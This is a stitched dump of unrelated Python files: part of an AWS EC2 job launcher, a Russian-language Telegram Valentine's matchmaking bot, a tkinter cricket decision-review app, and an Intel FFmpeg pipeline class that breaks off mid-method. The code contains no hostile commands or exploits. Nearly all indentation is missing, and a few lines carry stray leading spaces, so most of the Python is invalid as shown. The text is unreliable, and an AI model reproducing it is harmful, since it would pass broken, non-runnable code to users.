instance_dns = [instance[Ec2.PUBLIC_DNS] for instance in instances]
return instance_dns
def _configure_instances(self, instance_dns):
if len(instance_dns) == 1:
self._configure_instance(instance_dns[0])
else:
threads = [threading.Thread(target=self._configure_instance, args=(dns,)) for dns in instance_dns]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
def _configure_instance(self, dns):
logger.info('Configuring instance {}'.format(dns))
ssh = SshSession(dns, Ec2.USER, key=self.key_material)
ssh.connect()
# Init
ssh.mkdir(KEY)
with ssh.cd(KEY):
ssh.mkdir('data')
ssh.mkdir('src')
ssh.run("echo \"Instance started\" > logs")
# Update
# ssh.run('sudo yum -y update')
# Configure logging
# ssh.run('sudo yum install -y awslogs')
with ssh.cd('/etc/awslogs'):
ssh.run('sudo aws s3 cp s3://{}/awscli.conf .'.format(self.arn))
ssh.run('sudo aws s3 cp s3://{}/awslogs.conf .'.format(self.arn))
ssh.run('sudo systemctl start awslogsd')
# Downloading data
if self.context is not None:
for key, data in self.context.data.items():
self._log(ssh, f'Downloading {key}')
with ssh.cd(KEY, 'data'):
ssh.run('aws s3 cp s3://{}/{} .'.format(data['bucket'], key))
# Create virtual env
self._log(ssh, 'Creating virtual env')
python = '' if self.python is None else '={}'.format(self.python)
ssh.run('yes | conda create -n {} python{}'.format(KEY, python))
# Installing packages
if self.packages is not None:
for package in self.doppel_packages:
self._log(ssh, f'Installing package {package.name}')
with ssh.cd(KEY):
ssh.run('aws s3 cp s3://{}/{name}.zip {name}.zip'.format(self.arn, name=package.name))
ssh.run('unzip {name}.zip -d {name}'.format(name=package.name))
if package.has_setup:
with ssh.activate(KEY), ssh.cd(KEY, package.name):
ssh.run('pip install .')
# Retrieve source
self._log(ssh, 'Installing source')
with ssh.cd(KEY):
if self.src is not None or self.file_path is not None:
ssh.run('aws s3 cp s3://{}/main.py src/main.py'.format(self.arn))
elif self.package is not None:
ssh.run('aws s3 cp s3://{}/src.zip src.zip'.format(self.arn))
ssh.run('unzip src.zip -d src')
# Install requirements
with ssh.cd(KEY, 'src'), ssh.activate(KEY):
if self.requirements is not None:
ssh.run('aws s3 cp s3://{}/requirements.txt .'.format(self.arn))
ssh.run('pip install -r requirements.txt')
elif self.package is not None and self.package.has_setup:
ssh.run('pip install .')
# Run user commands
if self.commands is not None:
for command in self.commands:
ssh.run(command)
# Run
self._log(ssh, 'Starting')
with ssh.activate(KEY), ssh.connection.prefix(self._export_env_vars()), ssh.cd(KEY, 'src'):
ssh.python(self.entry_point or 'main.py', disown=True)
def _log(self, ssh, message):
with ssh.cd(KEY):
ssh.run(f"echo \"{message}\" >> logs")
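    # Build the `export VAR=value && ...` prefix for the environment variables injected into the remote session.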
def _export_env_vars(self):
if self.env_vars is None:
env_vars = {}
else:
env_vars = self.env_vars.copy()
env_vars['DOPPEL'] = 'true'
env_vars['DOPPEL_NAME'] = self.name
env_vars['DOPPEL_ARN'] = self.arn
env_vars['DOPPEL_REGION'] = self.ec2.region
pythonpath = self._get_pythonpath()
if len(pythonpath) > 0:
env_vars['PYTHONPATH'] = ':'.join(pythonpath)
return ' && '.join(['export {}={}'.format(k, v) for k, v in env_vars.items()])
def _get_pythonpath(self):
pythonpath = []
self._add_to_pythonpath(self.package, pythonpath, is_src=True)
if self.packages is not None:
[self._add_to_pythonpath(package, pythonpath, is_src=False) for package in self.doppel_packages]
return pythonpath
@staticmethod
def _add_to_pythonpath(package, pythonpath, is_src=True):
if package is None:
return
if package.add_to_pythonpath:
package_path = '/home/ec2-user/doppel/'
if is_src:
package_path += 'src'
else:
package_path += package.name
pythonpath.append(package_path)
def status(self):
instances = self.ec2.get_instances_by_tag(KEY, self.name)
print('-------- {}: {} instances'.format(self.name, len(instances)))
for instance in instances:
launch = instance['LaunchTime']
runtime = datetime.now(launch.tzinfo) - launch
print('[{}] {}, launched {:.1f} hours ago'.format(instance['InstanceId'], instance['State']['Name'], runtime.total_seconds()/3600))
def monitore(self):
if not self.initialized:
self.init()
while True:
if self.duration is not None and self._get_duration() > self.duration:
logger.info('Terminating project...')
self.terminate()
break
states = self.ec2.get_instances_by_tag(KEY, self.name, attribute=['State', 'Name'])
n_running = len([state for state in states if state == 'running'])
logger.info('{} instances running'.format(n_running))
missing_instances = self.n_instances - n_running
if missing_instances > 0:
logger.info('Starting {} new instances'.format(missing_instances))
instance_dns = self._start_instances(missing_instances)
self._configure_instances(instance_dns)
time.sleep(300)
def _get_duration(self):
if self.start_time is None:
raise ValueError('project not started')
return (datetime.now() - self.start_time).total_seconds() / 3600
def terminate(self):
instance_ids = self.ec2.get_instances_by_tag(KEY, self.name, 'InstanceId')
if len(instance_ids) > 0:
self.ec2.terminate_instances(instance_ids)
self.ec2.delete_key_pair_by_tag(KEY, self.name)
self.ec2.delete_security_group_by_tag(KEY, self.name)
self.iam.delete_instance_profile(self.instance_profile_name)
self.iam.delete_role(self.role_name)
self.terminated = True
self.save()
def destroy(self):
self.terminate()
self.bucket.empty()
self.bucket.delete()
|
bot.py
|
from telegram.ext import CommandHandler, MessageHandler, CallbackQueryHandler, Filters
from work_materials.globals import updater, dispatcher, castles as castles_const, classes_list as classes_const,\
conn, cursor, admin_ids
import work_materials.globals as globals
from libs.start_pult import rebuild_pult
from bin.save_load_user_data import loadData, saveData
from bin.pult_callback import pult_callback
from bin.shipper import shipper, shipper_selected_castle, shipper_selected_class, shipper_force, shadow_letter, \
shadow_letter_confirm, shadow_letter_send, shadow_letter_cancel, fill_shippers, shipper_mute, shipper_unmute, \
reply_to_message, reply_confirm, reply_cancel, reply_send, fill_sent_messages
from bin.profile import profile, shipper_history, shipper_history_short
from bin.message_mass_send import mass_send_start
from work_materials.filters.service_filters import filter_is_admin, filter_only_registration, filter_delete_yourself
from work_materials.filters.shipper_filters import filter_shipper_castle, filter_shipper_class, filter_mute_shipper, filter_unmute_shipper
from work_materials.filters.shadow_letter_filters import filter_shadow_letter, filter_awaiting_shadow_letter, \
filter_confirm_shadow_letter, filter_cancel_shadow_letter, filter_reply_to_message, filter_awaiting_reply, \
filter_confirm_reply, filter_cancel_reply
import logging, threading
# Set up logging
console = logging.StreamHandler()
console.setLevel(logging.INFO)
log_file = logging.FileHandler(filename='error.log', mode='a')
log_file.setLevel(logging.ERROR)
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level = logging.INFO, handlers=[log_file, console])
def start(bot, update, user_data):
mes = update.message
if user_data.get('class') is not None:
bot.send_message(chat_id = mes.chat_id,
text = "Вы уже зарегистрированы!\nИспользуйте /shipper, чтобы найти пару, "
"или /profile, чтобы посмотреть профиль и историю поиска")
return
pult_status = {'castle' : -1, 'class' : -1}
user_data.update({'castles' : castles_const.copy(), 'classes' : classes_const.copy(), 'start_pult_status' : pult_status})
reply_markup = rebuild_pult("default", None, user_data)
bot.send_message(chat_id = mes.chat_id, text = "Выберите свой замок и класс!", reply_markup = reply_markup)
if update.message.from_user.username is None:
bot.send_message(chat_id = update.message.chat_id,
text = "У вас не установлено имя пользователя, поэтому часть функций бота будет для вас недоступна. Например, вас не смогут находить другие пользователи бота.\n" \
"Вы можете использовать /delete_self до первого поиска (если Вы уже прошли регистрацию), установить имя пользователя Telegram (откройте настройки Telegram -> username) и зарегистрироваться в боте заново (/start) для снятия ограничений.")
def delete_self(bot, update, user_data):
user_data.clear()
request = "delete from players where telegram_id = %s"
cursor.execute(request, (update.message.from_user.id,))
bot.send_message(chat_id = update.message.chat_id, text = "Удаление завершено")
start(bot, update, user_data)
def bot_help(bot, update):
response = "Данный бот предназначен для помощи игрокам чв в нахождении вторых половинок и приурочен к 14 февраля.\nСписок доступных команд:\n"
response += "/start - Регистрация в боте, всё очевидно.\n/shipper - Начать процесс поиска, можно использовать 1 раз в час\n"
response += "/delete_self - Удаление регистрации, можно использовать до первого успешного /shipper\n"
response += "/profile - Отображение основной информации.\n/shipper_history - Отображение истории поиска (последние 10 результатов, для отображения полной - /shipper_history_full)\n"
response += "/disable_shipper - Отключить участие в шиппере\n"
response += "Так же доступны некоторые другие команды, подсказки будут возникать по ходу использования.\n\n"
if update.message.from_user.id in admin_ids:
response += "<b>Admin features:</b>\n"
response += "/delete_self - аналогично, но работает в любое время (использовать с огромной осторожностью, " \
"возможна значительная потеря данных\n/shipper_force - Тот же шиппер, но с игнорированием временных " \
"ограничений, не будет учитываться в статистике и при самом шиппере."
bot.send_message(chat_id = update.message.chat_id, text = response, parse_mode = 'HTML')
def inline_callback(bot, update, user_data):
if update.callback_query.data.find("p") == 0:
pult_callback(bot, update, user_data)
return
def only_registration(bot, update):
bot.send_message(chat_id = update.message.chat_id,
text = "До 14 февраля доступна только регистрация! Наберитесь терпения!\n"
"Вы можете использовать /profile для проверки регистрации")
def unknown_message(bot, update):
bot.send_message(chat_id = update.message.chat_id, text = "Некорректный ввод, попробуйте повторить /shipper")
def disable_shipper(bot, update):
request = "update players set shipper_enabled = FALSE where telegram_id = %s"
cursor.execute(request, (update.message.from_user.id,))
bot.send_message(chat_id = update.message.chat_id,
text = "Вы больше не участвуете в поиске пар :-(\n\n"
"Если передумаете, нажмите /enable_shipper")
def enable_shipper(bot, update):
request = "update players set shipper_enabled = TRUE where telegram_id = %s"
cursor.execute(request, (update.message.from_user.id,))
bot.send_message(chat_id = update.message.chat_id,
text = "Вы снова участвуете в подборе!")
def disable_waiting_time(bot, update):
mes = update.message
player_id = int(mes.text.partition(" ")[2])
user_data = dispatcher.user_data.get(player_id)
if user_data is None:
bot.send_message(chat_id = mes.chat_id, text = "Данных о пользователе не найдено!")
return
last_time_shipper_used = user_data.get("last_shipper_time")
if last_time_shipper_used is None:
bot.send_message(chat_id=mes.chat_id, text="Время последнего использования не найдено!")
return
user_data.pop("last_shipper_time")
bot.send_message(chat_id=mes.chat_id, text="Успешно")
dispatcher.add_handler(CommandHandler('start', start, pass_user_data=True))
dispatcher.add_handler(CommandHandler('help', bot_help))
dispatcher.add_handler(CommandHandler('profile', profile, pass_user_data=True))
dispatcher.add_handler(CommandHandler('shipper_history_full', shipper_history, pass_user_data=True))
dispatcher.add_handler(CommandHandler('shipper_history', shipper_history_short, pass_user_data=True))
dispatcher.add_handler(CommandHandler('disable_shipper', disable_shipper, pass_user_data=False))
dispatcher.add_handler(CommandHandler('enable_shipper', enable_shipper, pass_user_data=False))
#dispatcher.add_handler(CommandHandler('delete_self', delete_self, filters=filter_is_admin, pass_user_data=True)) # Disabled entirely; otherwise it would cascade and break shipper matches, both the user's own and those involving them
dispatcher.add_handler(CommandHandler('delete_self', delete_self, filters=filter_delete_yourself, pass_user_data=True))
dispatcher.add_handler(CommandHandler('shipper_force', shipper_force, filters=filter_is_admin, pass_user_data=True))
dispatcher.add_handler(CommandHandler('disable_waiting_time', disable_waiting_time, filters=filter_is_admin, pass_user_data=False))
dispatcher.add_handler(CommandHandler('send_start_all', mass_send_start, filters=filter_is_admin, pass_user_data=False))
dispatcher.add_handler(MessageHandler(filter_only_registration, only_registration)) # TODO: re-enable
dispatcher.add_handler(CommandHandler('shipper', shipper, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.text & filter_shipper_castle, shipper_selected_castle, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.text & filter_shipper_class, shipper_selected_class, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_shadow_letter, shadow_letter, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.text & filter_awaiting_shadow_letter, shadow_letter_confirm, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_confirm_shadow_letter, shadow_letter_send, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_cancel_shadow_letter, shadow_letter_cancel, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_mute_shipper, shipper_mute, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_unmute_shipper, shipper_unmute, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_reply_to_message, reply_to_message, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.text & filter_awaiting_reply, reply_confirm, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_confirm_reply, reply_send, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.command & filter_cancel_reply, reply_cancel, pass_user_data=True))
dispatcher.add_handler(MessageHandler(Filters.all, unknown_message))
dispatcher.add_handler(CallbackQueryHandler(inline_callback, pass_update_queue=False, pass_user_data=True))
loadData()
fill_shippers()
fill_sent_messages()
save_user_data = threading.Thread(target=saveData, name="Save User Data")
save_user_data.start()
updater.start_polling(clean=False)
# Stop the bot if Ctrl + C was pressed
updater.idle()
globals.processing = 0
# Close the database connection.
conn.close()
|
main.py
|
import tkinter
import cv2
import PIL.Image, PIL.ImageTk
from functools import partial
import threading
import imutils
import time
stream = cv2.VideoCapture("./video/clip.mp4")
flag = True
def play(speed):
global flag
print(f"You clicked on play. Speed is {speed}")
# Playing the video
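    # Seek relative to the current frame: positive speeds skip ahead, negative
    # speeds rewind; each button press renders a single frame.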
frame1 = stream.get(cv2.CAP_PROP_POS_FRAMES)
stream.set(cv2.CAP_PROP_POS_FRAMES, frame1 + speed)
grabbed, frame = stream.read()
if not grabbed:
exit()
    # OpenCV returns BGR frames; convert to RGB before building the PIL image
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
if flag:
canvas.create_text(137, 26, fill="red", font="Times 26 bold", text="Decision Pending")
flag = not flag
def pending(decision):
    # 1. Display decision pending image
frame = cv2.cvtColor(cv2.imread("./images/pending.png"), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
    # 2. Wait for 2 seconds
time.sleep(2)
# 3. Display sponsor image
frame = cv2.cvtColor(cv2.imread("./images/sponsor.png"), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
    # 4. Wait for 1.25 seconds
time.sleep(1.25)
# 5. Display out/not_out image
if decision == 'out':
decisionImg = "./images/out.png"
else:
decisionImg = "./images/not_out.png"
frame = cv2.cvtColor(cv2.imread(decisionImg), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
    # 6. Wait for 2 seconds
def out():
thread = threading.Thread(target=pending, args=("out",))
    thread.daemon = True
thread.start()
print("Player is out")
def not_out():
thread = threading.Thread(target=pending, args=("not out",))
    thread.daemon = True
thread.start()
print("Player is not out")
# Width and Height of main screen
SET_WIDTH = 650
SET_HEIGHT = 365
# Tkinter gui starts here
window = tkinter.Tk()
window.title("Third Umpire Decision Review Kit")
cv_img = cv2.cvtColor(cv2.imread("./images/welcome.png"), cv2.COLOR_BGR2RGB)
canvas = tkinter.Canvas(window, width=SET_WIDTH, height=SET_HEIGHT)
photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
image_on_canvas = canvas.create_image(0, 0, anchor=tkinter.NW, image=photo)
canvas.pack()
# Buttons to control playback
btn = tkinter.Button(window, text="<< Previous (fast)", width=50, command=partial(play, -25))
btn.pack()
btn = tkinter.Button(window, text="<< Previous (slow)", width=50, command=partial(play, -2))
btn.pack()
btn = tkinter.Button(window, text="Next (slow) >>", width=50, command=partial(play, 2))
btn.pack()
btn = tkinter.Button(window, text="Next (fast) >>", width=50, command=partial(play, 25))
btn.pack()
btn = tkinter.Button(window, text="Give Out", width=50, command=out)
btn.pack()
btn = tkinter.Button(window, text="Give Not Out", width=50, command=not_out)
btn.pack()
window.mainloop()
|
ffmpeg_pipeline.py
|
'''
* Copyright (C) 2019-2020 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
import string
import shlex
import subprocess
import time
import copy
from threading import Lock
from threading import Thread
import shutil
import re
from collections import OrderedDict
from collections import namedtuple
from collections import Counter
import json
import os
from datetime import datetime, timedelta
from vaserving.pipeline import Pipeline
from vaserving.common.utils import logging
if shutil.which('ffmpeg') is None:
raise Exception("ffmpeg not installed")
class FFmpegPipeline(Pipeline):
SECONDS_TO_NANOSECONDS = 10**9
GVA_INFERENCE_FILTER_TYPES = ["detect",
"classify"]
FilterPropertyConfig = namedtuple("FilterPropertyConfig",
["name",
"type",
"property",
"enum_values",
"index",
"format"])
VideoFilters = namedtuple("VideoFilters", ["range", "token", "filters"])
VideoFilter = namedtuple("VideoFilter", ["name", "index", "properties"])
Input = namedtuple("Input", ["range", "token", "properties"])
Output = namedtuple("Output", ["range", "token", "format", "properties"])
def __init__(self, identifier, config, model_manager, request, finished_callback, _unused_options):
# TODO: refactor as abstract interface
# pylint: disable=super-init-not-called
self.config = config
self.models = model_manager.models
self.model_manager = model_manager
self.template = config['template']
self.identifier = identifier
self._process = None
self.start_time = None
self.stop_time = None
self._ffmpeg_launch_string = None
self.request = request
self.state = Pipeline.State.QUEUED
self.fps = 0
self._finished_callback = finished_callback
self._logger = logging.get_logger('FFmpegPipeline', is_static=True)
self._fps_regex = re.compile(
r"\s*frame=\s*(?P<frame_count>\d+)\s*fps=\s*(?P<fps>\d+\.?\d*).*"
r"time=(?P<duration>\d+:\d+:\d+\.\d+).*speed=\s*(?P<speed>\d+\.\d+)x")
self._recording_started_regex = re.compile(
r"\[segment @ 0x.*?\] Opening '(.*?)' for writing")
self._recording_prefix = None
self._current_recording = None
self._stream_base = None
self._real_base = None
self._temp_recording_dir = None
self._recording_dir = None
self._ffmpeg_args = None
self._video_filters = None
self._inputs = None
self._outputs = None
self._create_delete_lock = Lock()
self._video_filter_index = Counter()
self._video_filter_map = {}
self._output_format_index = Counter()
self._output_format_map = {}
self.pipeline_type = "FFmpeg"
def stop(self):
with self._create_delete_lock:
if (not self.state.stopped()):
self.state = Pipeline.State.ABORTED
return self.status()
def params(self):
# TODO: refactor common code
request = copy.deepcopy(self.request)
if "models" in request:
del request["models"]
params_obj = {
"id": self.identifier,
"request": request,
"type": self.config["type"],
"launch_command": self._ffmpeg_launch_string
}
return params_obj
def status(self):
self._logger.debug("Called Status")
if self.stop_time is not None:
elapsed_time = self.stop_time - self.start_time
elif self.start_time is not None:
elapsed_time = time.time() - self.start_time
else:
elapsed_time = None
status_obj = {
"id": self.identifier,
"state": self.state,
"avg_fps": self.fps,
"start_time": self.start_time,
"elapsed_time": elapsed_time
}
return status_obj
@staticmethod
def validate_config(config):
pass
def _get_fps(self, next_line):
# Note: ffmpeg doesn't immediately report fps
# which can cause issues for short clips
# We calculate it if fps is 0 otherwise we
# report what ffmpeg provides
matched = self._fps_regex.match(next_line)
if (matched):
fps = float(matched.group('fps'))
if (fps > 0):
self.fps = fps
return
speed = float(matched.group("speed"))
frame_count = int(matched.group("frame_count"))
time_value = datetime.strptime(
matched.group("duration"), "%H:%M:%S.%f")
duration = timedelta(
hours=time_value.hour,
minutes=time_value.minute,
seconds=time_value.second,
microseconds=time_value.microsecond)
self.fps = (frame_count / (duration.total_seconds())) * speed
def _check_for_started_recording(self, next_line):
# We check when a new segment is started to indicate
# when the current segment is complete and can be moved
if self._recording_prefix:
matched = self._recording_started_regex.match(next_line)
if (matched):
self._move_current_recording()
self._current_recording = matched.groups()[0]
def _get_stream_time(self, recording):
args = ["ffprobe", "-show_entries", "stream=start_time",
"-print_format", "json", "-v", "quiet", "-hide_banner", recording]
result = json.loads(subprocess.check_output(args))
if (('streams' in result) and
(len(result['streams']) > 0) and
('start_time' in result['streams'][0])):
start_time = int(float(result['streams'][0]['start_time']) * 10**9)
if (not self._stream_base):
self._stream_base = start_time
return start_time - self._stream_base
def _move_current_recording(self):
if (self._current_recording):
stream_time = self._get_stream_time(self._current_recording)
adjusted_time = self._real_base + stream_time
local_time = time.localtime(
adjusted_time / FFmpegPipeline.SECONDS_TO_NANOSECONDS)
dir_name = time.strftime(
"{}/%Y/%m/%d".format(self._recording_prefix), local_time)
if (dir_name != self._recording_dir):
os.makedirs(dir_name, exist_ok=True)
self._recording_dir = dir_name
filename = "{dirname}/{adjustedtime}_{time}.mp4".format(
dirname=dir_name,
adjustedtime=adjusted_time,
time=stream_time)
os.rename(self._current_recording, filename)
def _spawn(self, args):
self._logger.debug("Launching: %s ", ' '.join(args))
with self._create_delete_lock:
            if self.state is not Pipeline.State.ABORTED:
self._process = subprocess.Popen(args, #pylint: disable=consider-using-with
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1,
universal_newlines=True)
self.state = Pipeline.State.RUNNING
else:
self._finished_callback()
return
self._process.poll()
        while self._process.returncode is None and self.state is not Pipeline.State.ABORTED:
next_line = self._process.stderr.readline()
self._logger.debug(next_line)
self._get_fps(next_line)
self._check_for_started_recording(next_line)
self._process.poll()
self.stop_time = time.time()
with self._create_delete_lock:
if self.state is Pipeline.State.ABORTED:
self._process.kill()
else:
if self._process.returncode == 0:
self.state = Pipeline.State.COMPLETED
else:
self.state = Pipeline.State.ERROR
self._process = None
self._finished_callback()
def _get_filter_properties(self, _filter):
result = {}
params = re.split("=|:", _filter)
result['_TYPE_'] = params[0]
result['_ORIG_'] = _filter
for x in range(1, len(params[0:]), 2):
result[params[x]] = params[x + 1]
return result
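    # For reference (illustrative input): "scale=w=640:h=360" is parsed into
    # {'_TYPE_': 'scale', '_ORIG_': 'scale=w=640:h=360', 'w': '640', 'h': '360'}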
def _join_filter_params(self, filter_type, filter_params):
parameters = ["%s=%s" % (x, y) for (x, y) in filter_params.items()]
return "{filter_type}={params}".format(filter_type=filter_type, params=':'.join(parameters))
def _set_default_models(self):
for video_filters in self._video_filters:
for _filter_key, _filter in video_filters.filters.items():
if ((_filter_key[0] in FFmpegPipeline.GVA_INFERENCE_FILTER_TYPES)
and ("VA_DEVICE_DEFAULT" in _filter.properties['model'])):
if "device" not in _filter.properties:
_filter.properties["device"] = "CPU"
_filter.properties["model"] = self.model_manager.get_default_network_for_device(
_filter.properties["device"], _filter.properties["model"])
self._logger.debug("Setting model to {} for filter {}".format(
_filter.properties["model"], _filter_key))
def _set_model_proc(self):
for video_filters in self._video_filters:
for _filter_key, _filter in video_filters.filters.items():
if ((_filter_key[0] in FFmpegPipeline.GVA_INFERENCE_FILTER_TYPES)):
if "model_proc" not in _filter.properties:
model_proc = None
if _filter.properties["model"] in self.model_manager.model_procs:
model_proc = self.model_manager.model_procs[_filter.properties["model"]]
if model_proc is not None:
_filter.properties["model_proc"] = model_proc
self._logger.debug("Setting model proc to {} for filter {}".format(
model_proc, _filter_key))
def _unescape_args(self, args):
for i, arg in enumerate(args):
args[i] = arg.replace(
'_COLON_', ':') if isinstance(arg, str) else arg
def _escape_source(self):
if "source" in self.request and "uri" in self.request["source"]:
self.request["source"]["uri"] = self.request["source"]["uri"].replace(
':', '_COLON_')
def _unescape_source(self):
if "source" in self.request and "uri" in self.request["source"]:
self.request["source"]["uri"] = self.request["source"]["uri"].replace(
'_COLON_', ':')
def _get_filter_property_config(self, _filter, config):
enum_values = None
if (("enum" in config) and ("values" in _filter)):
enum_values = dict(zip(config["enum"], _filter["values"]))
return FFmpegPipeline.FilterPropertyConfig(_filter["name"],
_filter["type"],
_filter.get(
"property", None),
enum_values,
_filter.get("index", 0),
_filter.get("format", None))
def _set_video_filter_property(self, _filter, _value):
key = (_filter.name, _filter.index)
if (key in self._video_filter_map):
if (_filter.enum_values):
_value = _filter.enum_values[_value]
if (_filter.format == 'json'):
_value = "\'{}\'".format(json.dumps(
_value).replace(':', r'\:'))
self._logger.debug("Setting filter: {}, property: {}, value: {}".format(
key,
_filter.property,
_value))
self._video_filter_map[key].properties[_filter.property] = _value
def _set_input_property(self, _filter, _value):
if (_filter.index < len(self._inputs)):
_input = self._inputs[_filter.index]
if (_filter.enum_values):
_value = _filter.enum_values[_value]
if (_filter.format == 'json'):
_value = "\'{}\'".format(json.dumps(
_value).replace(':', r'\:'))
if (_filter.property.endswith("_ARG_")):
_input.properties["_ARGS_"] = ([
_value
if arg == _filter.property else arg
for arg in _input.properties["_ARGS_"]
])
self._logger.debug("Setting input: {}, property: {}, value: {}".format(
(_filter.name, _filter.index),
_filter.property,
_value))
def _set_output_property(self, _filter, _value):
key = (_filter.name, _filter.index)
if (key in self._output_format_map):
_output = self._output_format_map[key]
if (_filter.enum_values):
_value = _filter.enum_values[_value]
if (_filter.format == 'json'):
_value = "\'{}\'".format(json.dumps(
_value).replace(':', r'\:'))
if ((_filter.name == "metapublish" and _filter.property == "_METAPUBLISH_ARG_") and
(not _output.properties["_ARGS_"])):
_output.properties["_ARGS_"].append("_METAPUBLISH_ARG_")
if (_filter.property.endswith("_ARG_")):
_output.properties["_ARGS_"] = ([
_value
if arg == _filter.property else arg
for arg in _output.properties["_ARGS_"]
])
else:
_output.properties[_filter.property] = _value
self._logger.debug("Setting Output: {}, property: {}, value: {}".format(
key,
_filter.property,
_value))
def _set_filter_property(self, _filter, _value):
if (_filter.type == "video"):
self._set_video_filter_property(_filter, _value)
elif(_filter.type == "input"):
self._set_input_property(_filter, _value)
elif(_filter.type == "output"):
self._set_output_property(_filter, _value)
def _set_section_properties(self, request_section, config_section):
request, config = Pipeline.get_section_and_config(
self.request, self.config, request_section, config_section)
for key in config:
if isinstance(config[key], dict) and "filter" in config[key]:
if key in request:
if isinstance(config[key]["filter"], list):
filter_properties = [self._get_filter_property_config(x, config[key])
for x in config[key]["filter"]]
else:
filter_properties = [self._get_filter_property_config(
config[key]["filter"], config[key])]
for _filter in filter_properties:
self._set_filter_property(_filter, request[key])
def _set_properties(self):
self._set_section_properties(["parameters"],
["parameters", "properties"])
self._set_section_properties(["destination"],
["destination", "properties"])
if "destination" in self.request and \
"metadata" in self.request["destination"] and \
"type" in self.request["destination"]["metadata"]:
self._set_section_properties(["destination", "metadata"],
["destination", "metadata",
self.request["destination"]["metadata"]["type"],
"properties"])
self._set_section_properties(["source"],
["source", "properties"])
if "source" in self.request and "type" in self.request["source"]:
self._set_section_properties(["source"],
["source", self.request["source"]["type"], "properties"])
self._set_section_properties([], [])
def _get_outputs(self, args):
# pylint: disable=unsupported-assignment-operation,unsubscriptable-object
result = []
args_remaining = len(args)
indices = [args_remaining - (x + 1) for x in range(len(args))]
current_output_properties = None
current_output_list = None
current_start = None
while(args_remaining):
index = indices[args_remaining - 1]
if (current_output_properties is not None):
if args[index].startswith('-'):
if (current_output_list is None):
current_output_properties[args[index]
] = args[index + 1]
args_remaining -= 2
continue
output_index = self._output_format_index[args[current_start + 1]]
output = FFmpegPipeline.Output((current_start, index - 1), "-f",
args[current_start + 1],
current_output_properties)
result.append(output)
self._output_format_map[(
args[current_start + 1], output_index)] = output
self._output_format_index[args[current_start + 1]] += 1
current_output_list = None
current_output_properties = None
current_start = None
else:
current_output_list = current_output_properties["_ARGS_"]
current_output_list.append(args[index])
args_remaining -= 1
continue
if (args[index] == '-f'):
current_start = index
current_output_properties = {}
current_output_properties["_ARGS_"] = []
args_remaining -= 2
index = index + 1
continue
args_remaining -= 1
if (current_output_properties is not None):
output_index = self._output_format_index[args[current_start + 1]]
output = self.Output((current_start, index), "-f",
args[current_start + 1], current_output_properties)
result.append(output)
self._output_format_map[(
args[current_start + 1], output_index)] = output
self._output_format_index[args[current_start + 1]] += 1
return result
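    # For reference (illustrative): for args ['ffmpeg', '-i', 'in.mp4', '-f', 'mp4', 'out.mp4']
    # _get_outputs yields a single Output with range (3, 5), format 'mp4' and
    # properties {'_ARGS_': ['out.mp4']}.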
def _get_video_filters(self, args):
result = OrderedDict()
vf_index = args.index('-vf') if ('-vf' in args) else None
if vf_index is None:
return result
filters = args[vf_index + 1].split(',')
for _filter in filters:
properties = self._get_filter_properties(_filter)
filter_type = properties.pop('_TYPE_')
index = self._video_filter_index[filter_type]
video_filter = FFmpegPipeline.VideoFilter(
filter_type, index, properties)
result[(filter_type, index)] = video_filter
self._video_filter_map[(filter_type, index)] = video_filter
self._video_filter_index[filter_type] += 1
return [FFmpegPipeline.VideoFilters((vf_index, vf_index + 1), '-vf', result)]
def _get_inputs(self, args):
result = []
for i, arg in enumerate(args):
if arg == '-i':
result.append(FFmpegPipeline.Input(
(i, i + 1), arg, {'_ARGS_': [args[i + 1]]}))
return result
def _parse_ffmpeg_launch_string(self, launch_string):
# TODO: Fully parse ffmpeg syntax
self._ffmpeg_args = ['ffmpeg']
self._ffmpeg_args.extend(shlex.split(launch_string))
self._video_filters = self._get_video_filters(self._ffmpeg_args)
self._outputs = self._get_outputs(self._ffmpeg_args)
self._inputs = self._get_inputs(self._ffmpeg_args)
def _generate_input(self, _input):
_input.properties["_ARGS_"].insert(0, '-i')
return _input.properties["_ARGS_"]
def _join_video_filter_properties(self, filter_type, filter_params):
parameters = ["%s=%s" % (x, y) for (x, y) in filter_params.items()]
return "{filter_type}={params}".format(filter_type=filter_type, params=':'.join(parameters))
def _generate_video_filter(self, video_filter):
result = [video_filter.token]
gva_filter_types = FFmpegPipeline.GVA_INFERENCE_FILTER_TYPES + \
["metaconvert"]
filter_components = []
for (name, _index), _filter in video_filter.filters.items():
if (name in gva_filter_types):
_filter.properties.pop("_ORIG_")
if (name == "metaconvert"):
if "converter" not in _filter.properties:
